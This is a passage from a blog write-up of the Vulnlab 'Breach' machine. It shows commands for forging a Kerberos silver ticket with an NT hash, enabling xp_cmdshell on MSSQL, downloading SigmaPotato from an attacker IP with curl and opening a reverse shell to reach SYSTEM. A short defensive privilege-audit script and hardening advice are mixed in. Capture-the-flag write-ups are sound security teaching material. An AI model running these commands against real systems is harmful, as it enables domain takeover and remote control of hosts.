➜  Breach ticketer.py -nthash 69596C7AA1E81AEE14F8E78870E21A5C -spn svc_mssql/BREACH.VL -domain BREACH.VL -domain-sid S-1-5-21-2330692793-3312915120-706225856 administrator
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for BREACH.VL/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in administrator.ccache
➜ Breach export KRB5CCNAME=administrator.ccache
```

After generating the ticket, I exported it via KRB5CCNAME and connected to MSSQL with Kerberos authentication:

```bash
➜  Breach impacket-mssqlclient breach.vl -target-ip 10.10.91.44 -windows-auth -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)> enable_xp_cmdshell
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)>
```

I was able to run the enable_xp_cmdshell command inside MSSQL.

After checking privileges, I found that svc_mssql has SeImpersonatePrivilege, so we can use SigmaPotato to get a shell as Administrator.

```bash
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell whoami
output
----------------
breach\svc_mssql

NULL

SQL (BREACH\Administrator dbo@master)>
SQL (BREACH\Administrator dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL

PRIVILEGES INFORMATION

----------------------

NULL

Privilege Name Description State

============================= ========================================= ========

SeAssignPrimaryTokenPrivilege Replace a process level token Disabled

SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled

SeMachineAccountPrivilege Add workstations to domain Disabled

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeManageVolumePrivilege Perform volume maintenance tasks Enabled

SeImpersonatePrivilege Impersonate a client after authentication Enabled

SeCreateGlobalPrivilege Create global objects Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

NULL

SQL (BREACH\Administrator dbo@master)>
```

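The whoami /priv table above is the check a defender should run against every service account before an attacker does. The following is an added example written for this writeup (not part of the original post or of SigmaPotato): it parses whoami /priv output exactly as captured through xp_cmdshell (NULL rows and collapsed whitespace included) and reports the privileges that let a service account escalate, treating "Disabled" as held rather than absent, since a process can re-enable its own token privileges. The second sample, a least-privilege token, is constructed for contrast.

```python
"""Audit a service account's token privileges from `whoami /priv` output.

Added example for this writeup, not part of the original post. The first
sample is the svc_mssql table captured above through xp_cmdshell; the second
is a constructed least-privilege token for comparison.
"""
from __future__ import annotations

# Privileges that let a service account reach SYSTEM or equivalent when held.
# SeImpersonatePrivilege is the one the Potato family relies on.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeTcbPrivilege",
    "SeDebugPrivilege", "SeLoadDriverPrivilege", "SeCreateTokenPrivilege",
    "SeTakeOwnershipPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
    "SeManageVolumePrivilege",
}

# svc_mssql's token as seen through xp_cmdshell in this writeup.
SVC_MSSQL_PRIV = """\
NULL

PRIVILEGES INFORMATION

----------------------

NULL

Privilege Name Description State

============================= ========================================= ========

SeAssignPrimaryTokenPrivilege Replace a process level token Disabled

SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled

SeMachineAccountPrivilege Add workstations to domain Disabled

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeManageVolumePrivilege Perform volume maintenance tasks Enabled

SeImpersonatePrivilege Impersonate a client after authentication Enabled

SeCreateGlobalPrivilege Create global objects Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

NULL
"""

# Constructed: what a least-privilege service token looks like natively.
LEAST_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""


def parse_whoami_priv(text: str) -> dict[str, tuple[str, bool]]:
    """Map privilege name -> (description, currently enabled).

    Works on native output and on the whitespace-collapsed copy seen through
    xp_cmdshell: the name is always the first token and the state the last.
    """
    privs: dict[str, tuple[str, bool]] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0].startswith("Se") or parts[-1] not in ("Enabled", "Disabled"):
            continue
        privs[parts[0]] = (" ".join(parts[1:-1]), parts[-1] == "Enabled")
    return privs


def risky_privileges(text: str) -> list[str]:
    """High-risk privileges the token holds, whether or not currently enabled.

    'Disabled' only means not active in the current token; the process can turn
    it on with AdjustTokenPrivileges, so for an audit presence is what matters.
    """
    return sorted(p for p in parse_whoami_priv(text) if p in HIGH_RISK)


if __name__ == "__main__":
    for label, sample in (("svc_mssql", SVC_MSSQL_PRIV), ("least-privilege", LEAST_PRIV_SAMPLE)):
        print(f"{label}: {risky_privileges(sample) or 'no high-risk privileges'}")
```

For svc_mssql the audit returns SeAssignPrimaryTokenPrivilege, SeImpersonatePrivilege and SeManageVolumePrivilege; the constructed least-privilege token returns nothing. SQL Server's service account is granted SeImpersonatePrivilege by setup, so the practical control here is upstream of the token: keep xp_cmdshell disabled, keep sysadmin membership minimal, and do not let the SQL service account double as a domain account with a crackable password.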
Privilege Escalation

I uploaded SigmaPotato through xp_cmdshell and got a reverse shell on my Kali machine:

```bash
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell curl http://10.8.3.249:1337/sig.exe.exe -o C:\ProgramData\\sig.exe
output
--------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 57344 100 57344 0 0 86360 0 --:--:-- --:--:-- --:--:-- 86361

NULL

SQL (BREACH\Administrator dbo@master)>
SQL (BREACH\Administrator dbo@master)> xp_cmdshell C:\ProgramData\sig.exe --revshell 10.8.3.249 443
```

```bash
➜  Breach nc -nvlp 443
Listening on 0.0.0.0 443
Connection received on 10.10.91.44 61353
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
```

We successfully obtained a shell running as NT AUTHORITY\SYSTEM, with full administrative privileges on the host.

  • Title: Breach Vulnlab
  • Author: Sebin Thomas
  • Created at : 2024-11-03 16:16:00
  • Updated at : 2025-02-24 21:01:48
  • Link: https://0xsebin-blogs.vercel.app/2024/11/03/Breach-Vulnlab/
  • License: All Rights Reserved © Sebin Thomas